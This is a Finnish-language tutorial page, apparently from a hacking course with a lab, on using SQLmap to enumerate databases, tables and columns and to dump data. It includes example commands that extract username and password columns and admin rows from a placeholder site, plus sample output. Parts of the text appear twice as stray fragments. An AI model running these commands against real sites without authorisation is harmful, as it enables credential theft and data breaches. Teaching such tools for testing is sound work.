Kun SQLmap löytää injektion, on tärkeää ymmärtää tietokannan rakenne ennen datan dumppausta.

Näiden vipujen avulla saadaan selkeä kuva tietokannasta ja voidaan kohdistaa dumppaus vain kriittisiin tietoihin.

Ensimmäinen vaihe on selvittää, mitä tietokantoja palvelimelta löytyy.

Kaikki käytettävissä olevat tietokannat.

Kun tiedät tietokannan nimen, kohdenna kaikki jatkotoiminnot siihen.

Nyt kaikki haut ja dumppaukset koskevat vain asiakasrekisteri-kantaa.

Seuraavaksi listataan valitun tietokannan taulut.

Näin näemme mitä tietokannan sisällä on.

Kun taulu on tunnistettu, voit rajata haut koskemaan vain sitä.

Näin dataa näytetään vain kayttajat-taulusta.

Taulun sisällä on sarakkeita (esim. käyttäjänimi, sähköposti, salasana). --columns-vivulla selvität, mitä sarakkeita taulussa on.

Näin nähdään tarkalleen mitä kenttiä taulussa on ja voit kohdistaa dumppauksen esimerkiksi salasanoihin.

Kun tiedät sarakkeiden nimet, voit valita vain ne, jotka ovat kiinnostavia. Tämä nopeuttaa dumppausta ja vähentää riskialttiiden tietojen turhaa paljastumista.

SQLmap hakee vain tunnus ja salasana -sarakkeet.

--post – testaa lomakedataa tehokkaasti

-pyyntöjä käyttäjän syötteen lähettämiseen, esimerkiksi kirjautumiseen, hakuihin tai lomakkeisiin. SQLmap osaa testata näitä pyyntöjä automaattisesti, kunhan sille kerrotaan mitä dataa POST-metodilla lähetetään.

-vivulla. Sen avulla SQLmap voi käsitellä lomakkeiden kenttiä samalla tavalla kuin URL-parametreja.

SQLmap testaa automaattisesti sekä user- että pass-parametrit SQL-injektioiden varalta

vaihtoehtoisesti voit testata vain yhden tai tietyt parametrin

 ja puretaan taulun sisältöä, oletuksena kaikki rivit haetaan. Joskus tämä ei ole tarpeen – ehkä haluat nähdä vain tietyt käyttäjät, tai tietyssä roolissa olevat rivit.

-vivulla voit antaa SQL-tyyppisen ehdon, joka rajoittaa, mitä rivejä dumppauksessa haetaan. Tämä toimii samalla tavalla kuin SQL-kyselyssä WHERE-lauseke.

Sinulla on kayttajat-taulu, jossa on 10 000 käyttäjää.

Et halua dumpata kaikkea, koska se on hidasta ja raskasta.

Tarkoituksenasi on löytää kaikki admin käyttäjät.

SQLmap hakee vain ne rivit kayttajat-taulusta, joissa rooli on admin.

Näitä vipuja käytetään yleensä tässä järjestyksessä:

 → kohdistaa testauksen tiettyyn kantaan

 → valitse vain tietyt sarakkeet dumppaukseen

Tämä on klassinen SQLmapin workflow: rakenne → sarakkeet → data. Sen avulla näet ensin kokonaisuuden ja päätät vasta sitten, mitä tietoa oikeasti tarvitsee purkaa.

Tässä labrassa pääset harjoittelemaan Sqlmap työkalun käyttöä.

MySQL Sqlmap login

Kun SQLmap löytää injektion, on tärkeää ymmärtää tietokannan rakenne ennen datan dumppausta.

- Mitä tietokantoja on olemassa?
- Mitä tauluja niissä on?
- Mitä sarakkeita taulut sisältävät?

Näiden vipujen avulla saadaan selkeä kuva tietokannasta ja voidaan kohdistaa dumppaus vain kriittisiin tietoihin.

## --dbs – listaa tietokannat

Ensimmäinen vaihe on selvittää, mitä tietokantoja palvelimelta löytyy.

**Esimerkki:**

```sh
sqlmap -u "http://sivu.fi/hae.php?id=1" --dbs
```

Tulos:

```sh
available databases [3]:
[*] information_schema
[*] asiakasrekisteri
[*] tuotetiedot
```

Kaikki käytettävissä olevat tietokannat.

---

## -D – valitse tietokanta

Kun tiedät tietokannan nimen, kohdenna kaikki jatkotoiminnot siihen.

**Esimerkki:**

```sh
sqlmap -u "http://sivu.fi/hae.php?id=1" -D asiakasrekisteri
```

Nyt kaikki haut ja dumppaukset koskevat vain asiakasrekisteri-kantaa.

---

## --tables – listaa taulut

Seuraavaksi listataan valitun tietokannan taulut.

**Esimerkki:**

```sh
sqlmap -u "http://sivu.fi/hae.php?id=1" -D asiakasrekisteri --tables
```

Tulos:

```sh
Database: asiakasrekisteri
[2 tables]
+-----------+
| kayttajat |
| tilaukset |
+-----------+
```

Näin näemme mitä tietokannan sisällä on.

---

## -T – valitse taulu

Kun taulu on tunnistettu, voit rajata haut koskemaan vain sitä.

**Esimerkki:**

```sh
sqlmap -u "http://sivu.fi/hae.php?id=1" -D asiakasrekisteri -T kayttajat
```

Näin dataa näytetään vain kayttajat-taulusta.

---

## --columns – listaa sarakkeet

Taulun sisällä on sarakkeita (esim. käyttäjänimi, sähköposti, salasana). --columns-vivulla selvität, mitä sarakkeita taulussa on.

**Esimerkki:**

```sh
sqlmap -u "http://sivu.fi/hae.php?id=1" -D asiakasrekisteri -T kayttajat --columns
```

Tulos:

```sh
Database: asiakasrekisteri
Table: kayttajat
[4 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| id       | int(11)     |
| tunnus   | varchar(50) |
| salasana | varchar(255)|
| rooli    | varchar(20) |
+----------+-------------+
```

Näin nähdään tarkalleen mitä kenttiä taulussa on ja voit kohdistaa dumppauksen esimerkiksi salasanoihin.

---

## -C – valitse sarakkeet dumppaukseen

Kun tiedät sarakkeiden nimet, voit valita vain ne, jotka ovat kiinnostavia. Tämä nopeuttaa dumppausta ja vähentää riskialttiiden tietojen turhaa paljastumista.

**Esimerkki:**

```sh
sqlmap -u "http://sivu.fi/hae.php?id=1" -D asiakasrekisteri -T kayttajat -C tunnus,salasana --dump
```

SQLmap hakee vain tunnus ja salasana -sarakkeet.

---

## --post – testaa lomakedataa tehokkaasti

Monet verkkosovellukset käyttävät **POST**-pyyntöjä käyttäjän syötteen lähettämiseen, esimerkiksi kirjautumiseen, hakuihin tai lomakkeisiin. SQLmap osaa testata näitä pyyntöjä automaattisesti, kunhan sille kerrotaan mitä dataa POST-metodilla lähetetään.

Tämä tehdään **--data**-vivulla. Sen avulla SQLmap voi käsitellä lomakkeiden kenttiä samalla tavalla kuin URL-parametreja.

**Esimerkki:**

```sh
sqlmap -u "http://sivu.fi/login.php" --data="user=admin&pass=salasana"
```

SQLmap testaa automaattisesti sekä user- että pass-parametrit SQL-injektioiden varalta

tai

vaihtoehtoisesti voit testata vain yhden tai tietyt parametrin

```sh
sqlmap -u "http://sivu.fi/login.php" --data="user=admin&pass=salasana" -p user

```

---

## --where - valitse mitä haluat nähdä

Kun SQLmapilla ajetaan **--dump** ja puretaan taulun sisältöä, oletuksena kaikki rivit haetaan. Joskus tämä ei ole tarpeen – ehkä haluat nähdä vain tietyt käyttäjät, tai tietyssä roolissa olevat rivit.

**--where**-vivulla voit antaa SQL-tyyppisen ehdon, joka rajoittaa, mitä rivejä dumppauksessa haetaan. Tämä toimii samalla tavalla kuin SQL-kyselyssä WHERE-lauseke.

**Esimerkki:**

- Sinulla on kayttajat-taulu, jossa on 10 000 käyttäjää.
- Et halua dumpata kaikkea, koska se on hidasta ja raskasta.
- Tarkoituksenasi on löytää kaikki admin käyttäjät.

```sh
sqlmap -u "http://sivu.fi/hae.php?id=1" -D asiakasrekisteri -T kayttajat --dump --where="rooli='admin'"

```

SQLmap hakee vain ne rivit kayttajat-taulusta, joissa rooli on admin.

---

## Workflow käytännössä

Näitä vipuja käytetään yleensä tässä järjestyksessä:

**Listaa tietokannat:**

```sh
sqlmap -u "http://sivu.fi/hae.php?id=1" --dbs
```

**Valitse yksi niistä:**

```sh
sqlmap -u "http://sivu.fi/hae.php?id=1" -D asiakasrekisteri
```

**Listaa taulut:**

```sh
sqlmap -u "http://sivu.fi/hae.php?id=1" -D asiakasrekisteri --tables
```

**Valitse taulu:**

```sh
sqlmap -u "http://sivu.fi/hae.php?id=1" -D asiakasrekisteri -T kayttajat
```

**Listaa taulun sarakkeet:**

```sh
sqlmap -u "http://sivu.fi/hae.php?id=1" -D asiakasrekisteri -T kayttajat --columns
```

**Rajaa kiinnostavat sarakkeet:**

```sh
sqlmap -u "http://sivu.fi/hae.php?id=1" -D asiakasrekisteri -T kayttajat -C tunnus,salasana --dump
```

---

## Yhteenveto

- **--dbs** → listaa kaikki tietokannat
- **-D** → kohdistaa testauksen tiettyyn kantaan
- **--tables** → listaa kantaan kuuluvat taulut
- **-T** → rajaa testauksen yhteen tauluun
- **--columns** → listaa taulun sarakkeet ja tyypit
- **-C** → valitse vain tietyt sarakkeet dumppaukseen

Tämä on klassinen SQLmapin workflow: rakenne → sarakkeet → data. Sen avulla näet ensin kokonaisuuden ja päätät vasta sitten, mitä tietoa oikeasti tarvitsee purkaa.

@exercise 39ea759613d0


SQLmap ja tietokantojen lukeminen

SQL-injektio lienee syynä valtaosaan vakavista tietomurroista, pääasiallisesti sen takia että haavoittuvuus on suuressa sovelluksessa erittäin todennäköinen jos teknologiavalinnat ovat huonot, ja seuraus on yleensä koko tietokannan vuotaminen hyökkääjälle.

SQLmap ja tietokantojen lukeminen

--dbs – listaa tietokannat

Hakkeroinnin oppiminen alkaa tästä